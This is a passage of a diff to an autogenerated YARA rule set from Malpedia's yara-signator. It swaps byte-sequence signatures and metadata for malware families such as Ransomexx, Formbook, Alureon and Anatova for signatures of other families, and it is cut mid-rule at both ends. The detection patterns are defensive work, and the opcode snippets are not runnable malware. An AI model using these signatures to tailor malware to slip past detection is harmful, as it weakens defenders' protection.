to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "36f8515b-9850-5f6a-9da2-fab216acb0f1" + id = "f239143d-e5d1-5c3c-aec9-a76464ab403c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mole_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransomexx_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "9e8bd455bb765e10346652a5931be596133d0a24ad14fb98b5a58db6c1dd57c3" + logic_hash = "3b39ad6bc64b52ed616287d6ece517d9776b1298e49d7060ccab50a0c57b68b4" score = 75 quality = 75 tags = "FILE" @@ -176385,32 +179072,32 @@ rule MALPEDIA_Win_Mole_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81bdf0fdffff99000000 0f8787710000 8b95f0fdffff 0fb68248c04000 ff248514c04000 81bdf0fdffffd3a7d105 0f8794000000 } - $sequence_1 = { 6bc000 0385bcf9ffff 898588e5ffff 837d1401 751a 68???????? 68???????? } - $sequence_2 = { 81bdf0fdffffcde5d405 0f8458400000 81bdf0fdffff41e6d405 0f849e440000 81bdf0fdffff44e6d405 0f84742c0000 e9???????? } - $sequence_3 = { e9???????? 81bdf0fdffff5625d105 0f8786000000 81bdf0fdffff5625d105 0f8494710000 81bdf0fdffffc624d105 7745 } - $sequence_4 = { 8d959cefffff 52 68???????? 6801000080 ff15???????? 898584efffff 8d85d4fbffff } - $sequence_5 = { 8d85ace4ffff 50 6a05 68???????? 8b8dc4e4ffff 51 ff15???????? } - $sequence_6 = { c7802ceb410002000000 6a04 58 6bc000 8b0d???????? 894c05f8 6a04 } - $sequence_7 = { 8d9530e2ffff 52 e8???????? 83c404 6a64 68???????? 8d85ecfbffff } - $sequence_8 = { 83c410 8d959cf9ffff 52 8b8590e5ffff } - $sequence_9 = { e8???????? e8???????? 898580f7ffff 81bd80f7ffff00300000 7575 6a00 } + $sequence_0 = { 8bc3 8d75e0 e8???????? 8bf0 85f6 0f85f8020000 eb07 } + $sequence_1 = { 6884010000 6a08 c745fc04010000 ffd7 50 ff15???????? 8bf0 } + $sequence_2 = { 8b4f08 3bce 7425 8b4704 03c0 03c0 } + $sequence_3 = { 8bf8 85ff 752c 8d55f8 c70601000000 6a02 } + $sequence_4 = { c1ee0a 33fe 8bf7 8b7dfc 039c3da4feffff 03f3 } + $sequence_5 = { c1ee03 33fe 03df 8b7dfc 039c3db8feffff 8bb43d94feffff 03f3 } + $sequence_6 = { 837df801 0f8612010000 8b4df8 8b5f04 49 b801000000 d3e0 } + $sequence_7 = { 8b55f0 8b4508 8d4dd0 51 52 57 50 } + $sequence_8 = { 56 50 e8???????? 8b07 83c40c 8975fc } + $sequence_9 = { 39742420 0f862e010000 8d642400 837c242001 7540 837c242400 7539 } condition: - 7 of them and filesize <297984 + 7 of them and filesize <372736 } -rule MALPEDIA_Elf_Persirai_Auto : FILE +rule MALPEDIA_Win_Killav_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8d888a8-efae-5fcd-8298-ba3399d89281" + id = "1d5124ec-5245-51ca-8b54-4fbeb7c8a843" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.persirai_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.killav_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "091433f152a0a1932173079b7afa5457b62363ecd6425f8d1d7de8df73a8fbb4" + logic_hash = "6bdcae63c9d790007a185fb309199c790674ed97c7a86b96314a377ad757753a" score = 75 quality = 75 tags = "FILE" @@ -176424,32 +179111,32 @@ rule MALPEDIA_Elf_Persirai_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 c3 53 83ec08 e8???????? 31d2 8b5c2414 } - $sequence_1 = { 8b5c2410 837c241400 740b 83ec0c ff7304 ff13 83c410 } - $sequence_2 = { 50 52 e8???????? 58 8d8424d8170000 50 e8???????? } - $sequence_3 = { 8d4400e0 50 e8???????? 89c2 a3???????? 83c410 83c8ff } - $sequence_4 = { 817c2414ff030000 0f8770030000 8b442414 c1e004 83b888a2050800 0f85df000000 8b0d???????? } - $sequence_5 = { c7042408000000 50 a1???????? 6a1a 6a01 50 e8???????? } - $sequence_6 = { 83c418 5b c3 81ecac000000 31d2 a1???????? } - $sequence_7 = { 85c0 74cb e8???????? 52 52 8b00 } - $sequence_8 = { c680b901000000 8b45f0 e8???????? 89f0 8b55f0 e8???????? 8b45f0 } - $sequence_9 = { 83c004 89442418 e9???????? bf0a000000 e9???????? bf10000000 e9???????? } + $sequence_0 = { c745e4e8e24200 e9???????? 894de0 c745e4e8e24200 e9???????? } + $sequence_1 = { 8955e0 8b048d70ba4300 f644102801 747c } + $sequence_2 = { 6a20 c745e000000000 e8???????? 8bf0 83c404 8975e0 } + $sequence_3 = { 8b45f8 8b55f0 8b048570ba4300 807c022800 } + $sequence_4 = { e8???????? 8b35???????? 6a00 6880000000 6a03 6a00 6a00 } + $sequence_5 = { c645fc1c 50 8d4dd0 e8???????? c645fc00 8b55ec 83fa08 } + $sequence_6 = { 8b049570ba4300 885c012e 8b049570ba4300 804c012d04 } + $sequence_7 = { 8d45d8 c645fc37 50 8d4dd0 } + $sequence_8 = { 6bf838 894df8 8b048d70ba4300 33c9 } + $sequence_9 = { e8???????? 8d45d8 c645fc08 50 8d4dd0 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <517120 } -rule MALPEDIA_Win_Tempedreve_Auto : FILE +rule MALPEDIA_Win_Formbook_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e62cef01-6d44-587e-a3de-2c290fdad6d7" + id = "5884ccaf-7c22-509b-b936-d78ce47dc38a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tempedreve_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.formbook_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "5e6b4c6e2f4e0f76996895055b92463fa9cea8a31f828bb15d4eb02a56497fa3" + logic_hash = "1856083163db4d487acf8602c72ba34a2aeebb6a0e8b028efa10c5ca24fd0c49" score = 75 quality = 75 tags = "FILE" @@ -176463,38 +179150,32 @@ rule MALPEDIA_Win_Tempedreve_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 011e 015e10 015e0c 0fb75706 } - $sequence_1 = { 011a 8b87dc000000 83c204 03c6 } - $sequence_2 = { 01042f 034c2ff8 8d45ec 894c2ff8 } - $sequence_3 = { 754f 85f6 744b 214524 8d4520 } - $sequence_4 = { 011a 45 8d14a9 8b02 } - $sequence_5 = { 0103 a1???????? 83c004 50 ff15???????? } - $sequence_6 = { 0104b7 8b8424a8000000 83c704 4d } - $sequence_7 = { 010f 8b07 83c704 3bc1 } - $sequence_8 = { 89542430 eb09 83f801 0f86c8010000 0fb64500 0fb64d01 } - $sequence_9 = { 85c0 0f85a9090000 53 8916 8d4e04 } - $sequence_10 = { 8bc8 c1e903 8d440140 c20400 } - $sequence_11 = { 899e1c040000 895c2458 3bc3 0f86eb070000 8d9b00000000 8b44245c 85c0 } - $sequence_12 = { 55 51 8bce 8d5c0301 e8???????? 3bd8 8b5c2458 } - $sequence_13 = { 72f3 8b4c2414 8b6c2428 3bda 0f84e1000000 } - $sequence_14 = { 8b6c2410 8bd3 2bd7 52 55 8bce e8???????? } - $sequence_15 = { 8b542430 3bda 7320 8d4d02 8be8 2b6c2428 } + $sequence_0 = { 5b 5f 5e 8be5 5d c3 8d0476 } + $sequence_1 = { 6a0d 8d8500fcffff 50 56 e8???????? 8d8d00fcffff 51 } + $sequence_2 = { 56 e8???????? 8d4df4 51 56 e8???????? 8d55e4 } + $sequence_3 = { c3 3c04 752b 8b7518 8b0e 8b5510 8b7d14 } + $sequence_4 = { 56 e8???????? 83c418 395df8 0f85a0000000 8b7d18 395f10 } + $sequence_5 = { c745fc01000000 e8???????? 6a14 8d4dec 51 50 } + $sequence_6 = { e8???????? 83c428 8906 85c0 75a8 5f 33c0 } + $sequence_7 = { 56 e8???????? 6a03 ba5c000000 57 56 66891446 } + $sequence_8 = { 3b75d0 72c0 8d55f8 52 e8???????? } + $sequence_9 = { 8d8df6f7ffff 51 c745fc00000000 668985f4f7ffff e8???????? 8b7508 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <371712 } -rule MALPEDIA_Win_Fakeword_Auto : FILE +rule MALPEDIA_Win_Royal_Dns_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dff35d24-3d8a-5dd3-be0c-60e6ee2ac528" + id = "8e27ee32-9aaf-59db-953d-0696af40bcce" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fakeword_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royal_dns_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "ba7599fef3200798ceac9b8a2a397ab651b3acac17ae30ecdd8eedb5f787592d" + logic_hash = "f281d4e3be759adcb32b06448d83aa5fdafcb96a4b912bbb46b43de4955e29ec" score = 75 quality = 75 tags = "FILE" @@ -176508,34 +179189,34 @@ rule MALPEDIA_Win_Fakeword_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 68???????? a3???????? 890d???????? c744240c10000000 c605????????11 c605????????22 } - $sequence_1 = { eb03 8b7de8 8d14b6 893d???????? } - $sequence_2 = { 7516 8b0a 8b6f34 25ff0f0000 03c3 03c1 } - $sequence_3 = { 6a00 6a10 8d7e14 56 6a04 } - $sequence_4 = { c684247603000031 754d 8d442454 8d8c2477030000 50 56 } - $sequence_5 = { 03c3 89442410 8b4804 85c9 750b 8b480c } - $sequence_6 = { 8b4701 8d4f09 8d743809 56 51 ff15???????? 83c408 } - $sequence_7 = { 8d1c02 3bd9 72f1 c6040f00 } - $sequence_8 = { b808000000 5e 83c440 c3 81fea1000000 7528 } - $sequence_9 = { 57 33c0 85d2 7e19 8bca 8bf3 8be9 } + $sequence_0 = { 50 e8???????? 8b4dfc 8b85b4fcffff 83c404 } + $sequence_1 = { e8???????? 83c40c 8bc6 eb15 8d8da1f1ffff } + $sequence_2 = { ff15???????? 3d02010000 8b85e0fdffff 7533 6a00 50 } + $sequence_3 = { 4a 759a 8b55fc 85ff 7468 0fb606 c1e802 } + $sequence_4 = { 0fb61406 c1ea03 0fb69248132500 8811 0fb61c06 0fb6540601 c1ea06 } + $sequence_5 = { 80e301 0ac3 8845ed 8a45f8 8ad8 8345e805 } + $sequence_6 = { 8d8dfcfeffff 83c40c 33c0 2bd1 } + $sequence_7 = { 7504 33c0 eb0a 0fb6c8 } + $sequence_8 = { 0fb61c30 0fb6543001 03db 03db c1ea06 0bd3 } + $sequence_9 = { 8a17 8816 47 46 48 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Slingshot_Auto : FILE +rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bf558dcd-c863-525d-b34a-1a56d33f94ec" + id = "9764afd8-8e4e-54dd-9ad2-bd1903f5455d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slingshot_auto.yar#L1-L218" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pittytiger_rat_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "1e413348df71e72118297c6913e2a6da9548aa658d39b7dcd425460f21f929c0" + logic_hash = "a2f2e591a5e3a3c37398ec723056984b2fa4039658f61ff9463c257a6584be3f" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -176547,45 +179228,32 @@ rule MALPEDIA_Win_Slingshot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 33db 53 ff15???????? 8bf0 3bf3 } - $sequence_1 = { 3bcb 7512 ff7708 ff37 } - $sequence_2 = { 48 8bf0 66895804 66897806 85ed } - $sequence_3 = { e8???????? e8???????? 8945d8 8955dc 3bc3 7d09 52 } - $sequence_4 = { e8???????? ff7004 8d742420 ff30 e8???????? 395c241c 7523 } - $sequence_5 = { 8be8 49 3bc6 750f baec040000 b90e000780 } - $sequence_6 = { e8???????? 59 8d75a4 e8???????? 8d7594 } - $sequence_7 = { 3bcb 7442 395dfc 7414 } - $sequence_8 = { 3bcb 7504 6a08 eb7a } - $sequence_9 = { 3919 740a 48 83c102 48 83e801 75f0 } - $sequence_10 = { 833d????????00 7546 b918000000 e8???????? 48 } - $sequence_11 = { 0f848a050000 45 33e4 0fb74c2448 83e961 } - $sequence_12 = { 3bcb 7552 dd45f0 dd4720 } - $sequence_13 = { 8bce 49 3bfe 741a } - $sequence_14 = { 59 c20400 8b4608 83f8ff } - $sequence_15 = { 3bcb 7461 8b01 83f807 } - $sequence_16 = { 3bcb 753c ff7708 eb28 } - $sequence_17 = { eb29 48 8d4c2448 e8???????? } - $sequence_18 = { e9???????? 8d85d0fdffff 50 ff15???????? } - $sequence_19 = { 894c9a08 8b5df8 03cb 8b5d0c 23c8 } - $sequence_20 = { ff7508 ffd7 85c0 7516 ff15???????? 6843458a04 } - $sequence_21 = { 0d00000780 8906 e8???????? 48 8bd6 48 } - $sequence_22 = { 3bcb 743b 6afe 58 8901 } + $sequence_0 = { 8175ec90b48f19 8175f0596f62d6 885df4 50 8d85d4ffffff } + $sequence_1 = { a3???????? 0f8451feffff 8d45b8 c745b84f70656e 50 57 } + $sequence_2 = { ab ab aa 8d7dc8 33c0 a5 } + $sequence_3 = { 397df8 7678 3bf7 7474 } + $sequence_4 = { 8bf8 83ffff 7512 ff15???????? } + $sequence_5 = { 3bc3 a3???????? 0f8476ffffff 8d459c c745ac65416500 50 } + $sequence_6 = { 7512 ff15???????? 50 53 } + $sequence_7 = { 50 895df8 ff7510 ff750c ff75fc } + $sequence_8 = { ff15???????? 85c0 741c 6a40 ff75f0 ffd7 6af1 } + $sequence_9 = { 8d85dcfdffff 50 8d85e0feffff 50 7407 68???????? eb05 } condition: - 7 of them and filesize <663552 + 7 of them and filesize <2162688 } -rule MALPEDIA_Win_Sfile_Auto : FILE +rule MALPEDIA_Win_Alureon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2a05bff3-25b7-5fd3-9a80-0b0955cab792" + id = "d906ba05-9af9-5358-abd3-33a25815a15f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sfile_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alureon_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "b6be99a284bb08bd87d7e6d12a69d9966762868a0d094add32f60ffa636331bd" + logic_hash = "69c2ddac38bf20f21fb2d59f504ac16289e135ccaf5d5c616ac40bfbb62cd466" score = 75 quality = 75 tags = "FILE" @@ -176599,34 +179267,40 @@ rule MALPEDIA_Win_Sfile_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 8b4d08 8b5144 } - $sequence_1 = { 8b55fc 83c201 8955fc 837dfc08 7d12 } - $sequence_2 = { e8???????? 83c41c eb2b 837d0803 7525 } - $sequence_3 = { 8bec 83ec20 8b4508 8b888c050000 } - $sequence_4 = { eb13 8b55f8 8b4210 8d0c8510000000 } - $sequence_5 = { 51 ff15???????? 8b55f0 52 ff15???????? 8b45ec 50 } - $sequence_6 = { c745fc08000000 eb09 8b85b8fdffff 8945fc 8b4dfc 83c106 } - $sequence_7 = { 8d4c0002 8b55e8 894a04 8b45f8 } - $sequence_8 = { 68fc000000 8b4df0 8b11 52 } - $sequence_9 = { c60100 837dec00 7547 6af5 ff15???????? 8945f0 } + $sequence_0 = { 59 32c0 8d7c2420 f3aa 8b4d14 } + $sequence_1 = { 3b442410 75cf 33c0 5f 5e 5b c20800 } + $sequence_2 = { 6800001000 8d45f8 50 c745d818000000 } + $sequence_3 = { 68000010c0 8d45fc 50 c745d818000000 } + $sequence_4 = { 6800000080 6a03 56 6a01 } + $sequence_5 = { 41 8bca 49 ffc7 } + $sequence_6 = { 2bc8 03cf 8908 eb2f 837dfc05 751c } + $sequence_7 = { 6800005600 8d45d0 50 53 } + $sequence_8 = { 53 ff15???????? 8945f8 56 } + $sequence_9 = { c745f000010000 749d ff75e8 ff15???????? } + $sequence_10 = { 66a5 8d85a8feffff 50 68???????? a4 } + $sequence_11 = { 741c 8d85e4fbffff 50 8d85f8feffff 50 } + $sequence_12 = { 837dfc0a 7cc0 eb32 8bc3 } + $sequence_13 = { 50 33f6 46 56 8d8424cc000000 50 } + $sequence_14 = { 8d8424ec010000 50 68???????? ff15???????? 85c0 0f84f2020000 } + $sequence_15 = { ff15???????? 85c0 7409 39b424c8000000 75cf 53 53 } condition: - 7 of them and filesize <588800 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Cueisfry_Auto : FILE +rule MALPEDIA_Win_Simplefilemover_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7fd15319-e895-59d1-bc47-6c7854fd0773" + id = "21ae03b9-45c9-58fd-b17b-9f1c4dcf7bf7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cueisfry_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.simplefilemover_auto.yar#L1-L219" license_url = "N/A" - logic_hash = "312c24021c3e8bf9c6e0d5e58840583a4541e92e9f141ae7391f901c409f9736" + logic_hash = "81c6919dbb4aaa2e054461ca67f688251b4ccec2baef13a001955aba375181dd" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -176638,32 +179312,44 @@ rule MALPEDIA_Win_Cueisfry_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? b8???????? c3 8b45ec c745fcffffffff 85c0 7406 } - $sequence_1 = { f3a5 52 e8???????? 8d44241c } - $sequence_2 = { e8???????? 85c0 750c 55 ff15???????? e9???????? } - $sequence_3 = { 8944241c 7c0d 80f95a 7f08 0fbee9 } - $sequence_4 = { 8975dc e8???????? 8b45ec 3bc7 750d } - $sequence_5 = { 8d4c2408 50 e8???????? b91f000000 33c0 8d7c2431 c644243000 } - $sequence_6 = { ff15???????? 8bb424a8010000 8d4c240c 51 8bce } - $sequence_7 = { 5f 5e 5d 32c0 5b 81c424030000 c3 } - $sequence_8 = { 8d4c240c c68424a001000001 e8???????? 8d8c24ac010000 889c24a0010000 e8???????? } - $sequence_9 = { 6a00 ff15???????? 68d0070000 ff15???????? 8d94249c000000 6a00 } + $sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 } + $sequence_1 = { 33c0 e9???????? 6820020000 ff15???????? } + $sequence_2 = { 81c420020000 85c0 7407 68???????? eb05 68???????? ff15???????? } + $sequence_3 = { b988000000 8bf3 8bfc f3a5 } + $sequence_4 = { 33ff 884c2408 3bf7 88542424 897c2410 } + $sequence_5 = { 7503 8bfa 46 668b4102 83c102 42 } + $sequence_6 = { 8b8d54faffff 51 ff15???????? 6a00 6800200000 8d9554daffff } + $sequence_7 = { 8b8554faffff 50 ff15???????? 85c0 } + $sequence_8 = { 8b74241c 57 8a8800010000 8a9001010000 33ff } + $sequence_9 = { ebc2 ebc0 ebbe ebbc ebba ebb8 } + $sequence_10 = { e8???????? 81c420020000 85c0 7410 68???????? ff15???????? } + $sequence_11 = { 8b4c2414 8d447b02 50 51 } + $sequence_12 = { 5f 889000010000 888801010000 5e 83c410 c3 } + $sequence_13 = { e9???????? 807d0867 0f848f020000 807d0870 0f8513040000 } + $sequence_14 = { 83bd08daffffff 7409 83bd08daffff00 750f c78508daffff00000000 e9???????? 6a04 } + $sequence_15 = { 47 897c2418 0fbfff 3bfb 0f8c54ffffff 8a4c242c } + $sequence_16 = { 6a64 ff15???????? ff4de0 395de0 7fd4 } + $sequence_17 = { 52 8d855cfaffff 50 8d8d60daffff 51 } + $sequence_18 = { 8d85b0ddffff 50 e8???????? 8d45dc 57 50 8b45f4 } + $sequence_19 = { 50 ff7610 6a00 6a00 ffd7 ff7508 8d4302 } + $sequence_20 = { 8b4c2408 8b742424 53 81e1ff000000 } + $sequence_21 = { 53 52 ff15???????? 83c408 5f 5e } condition: - 7 of them and filesize <81920 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Explosive_Rat_Auto : FILE +rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "863a5681-ec58-58c3-aa41-9d8844c2c73c" + id = "6cd7c8c4-20c9-5c58-baa7-e42d545001dc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.explosive_rat_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anatova_ransom_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "e75d842c394fc045ddd0745106b1430d3dd968c3b7d21e3af7bbb4c3b56a96a4" + logic_hash = "2867d50f6d60295cd1f6876cf7316363316dea4699194cf318a991da479d380e" score = 75 quality = 75 tags = "FILE" @@ -176677,32 +179363,32 @@ rule MALPEDIA_Win_Explosive_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945c4 8b4514 8945c8 7611 33c0 8a03 8d4dc4 } - $sequence_1 = { 7445 6a03 8bc7 e8???????? 8b8648af0100 8bae44af0100 83c00a } - $sequence_2 = { 66832300 33c0 c9 c3 85c0 7515 } - $sequence_3 = { eb60 807e0400 7507 8bce e8???????? 807e0530 7c62 } - $sequence_4 = { 53 55 8b6c2448 8b4d04 8b4104 56 8bf1 } - $sequence_5 = { 85ed 75e5 83f808 896b14 720f 8b4304 5f } - $sequence_6 = { 68???????? 51 e8???????? 8b4c2468 8b7c245c 50 8b442470 } - $sequence_7 = { 8b442430 83c408 3bc7 720d 8b4c2414 51 e8???????? } - $sequence_8 = { 8d5dd0 e8???????? 46 ebb8 b8???????? e8???????? be???????? } - $sequence_9 = { 89ae88af0600 8bfa 7d2e 8a5c0aff 8a140a 885c241c 8854240f } + $sequence_0 = { 488d05ec570000 48894588 488d05eb570000 48894590 } + $sequence_1 = { b805000000 4989c3 488b01 4989c2 4c89d1 4c89da e8???????? } + $sequence_2 = { 4989c2 4c89d1 e8???????? e9???????? 488b45e0 4989c2 4c89d1 } + $sequence_3 = { e8???????? 488b05???????? 488b0d???????? 488b15???????? 488945f0 488d45fc 4889442420 } + $sequence_4 = { 4883f800 0f84b2000000 488b05???????? 4883f800 0f84a1000000 488b05???????? } + $sequence_5 = { 4989c2 4c89d1 e8???????? 488b05???????? 4883f800 0f843e000000 8b05???????? } + $sequence_6 = { b800000000 4989c3 b802000000 4989c2 4c89d1 4c89da 4c8b1d???????? } + $sequence_7 = { 4989c0 488b45d8 4989c3 488b45a0 4989c2 4c89d1 4c89da } + $sequence_8 = { 4989c1 b800000000 4989c0 b800000000 4989c3 } + $sequence_9 = { 48b80f00000000000000 4989c0 b800000000 4989c3 488d45b1 4989c2 4c89d1 } condition: - 7 of them and filesize <855040 + 7 of them and filesize <671744 } -rule MALPEDIA_Win_Slave_Auto : FILE +rule MALPEDIA_Win_Alma_Communicator_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2db01cdc-36fb-5960-a7bc-78a56f81c6bb" + id = "bb280ae5-df93-5ddd-a029-1d8f19d4cee3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slave_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alma_communicator_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "b1287622c49df3c1a2838a3a773babcdc61506504422851d523ef94f6f257153" + logic_hash = "ceeffab13f59872b0e8352c80061e88c0752f86bcb15a8ae0c39228603990d18" score = 75 quality = 75 tags = "FILE" @@ -176716,32 +179402,32 @@ rule MALPEDIA_Win_Slave_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 0f84e0020000 6a04 6800100000 6800100000 } - $sequence_1 = { 7514 66837b0600 7405 8a4306 } - $sequence_2 = { 0fbf4720 33d2 50 0fb6c1 68???????? 83c008 } - $sequence_3 = { 730d 810e00000800 808b0603000040 8b4610 808b0603000010 8a55ff } - $sequence_4 = { c74710d5000000 eb10 c7471095000000 eb07 c7471085000000 f70700400000 742f } - $sequence_5 = { c1c90d 33c8 8b7dd4 8b45e8 03fa c1c802 33c8 } - $sequence_6 = { 83ec24 53 32c0 32c9 56 8b7508 } - $sequence_7 = { 8a8e08010000 f6c210 0f8411040000 8b8610030000 0b8614030000 0f84c2000000 f6c240 } - $sequence_8 = { 8bc6 c1c806 33c8 8bc3 3345d4 034da0 } - $sequence_9 = { 8bd8 0b5df4 2345f4 03ca 235de0 0bd8 8b55ac } + $sequence_0 = { 8a4a1c 884807 a1???????? c6400800 e8???????? 59 } + $sequence_1 = { 8945f0 8b450c 8945f4 8b4514 40 c745ec93f84000 894df8 } + $sequence_2 = { 8bcb 898554f7ffff e8???????? 8bcb 898550f7ffff 6a02 5f } + $sequence_3 = { e8???????? 83c40c 8d8d58ffffff 8d5102 } + $sequence_4 = { 8974241c 68d0070000 832600 897c2424 } + $sequence_5 = { 668b4f02 03fe 663bca 75f5 ffb53cf7ffff 8907 6bc328 } + $sequence_6 = { 0f85aa010000 33c0 40 8985ccebffff } + $sequence_7 = { 7204 3c7a 7608 3c2b 7404 3c2f } + $sequence_8 = { 88840d20f6ffff 41 84c0 75ed 8d8d20f6ffff 49 8a4101 } + $sequence_9 = { 8a01 41 84c0 75f9 8a442454 2bca 83f901 } condition: - 7 of them and filesize <532480 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Kwampirs_Auto : FILE +rule MALPEDIA_Win_Cycbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "25decd9c-07db-5eba-ac2c-8b87bfe95cdd" + id = "86cbdc6e-7fe8-5962-82c9-3bfe759d3962" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kwampirs_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cycbot_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "6b54d71a60f0765ea0fd29b4cf202a2af753cd8f92ae599bc00fdafc2b919f65" + logic_hash = 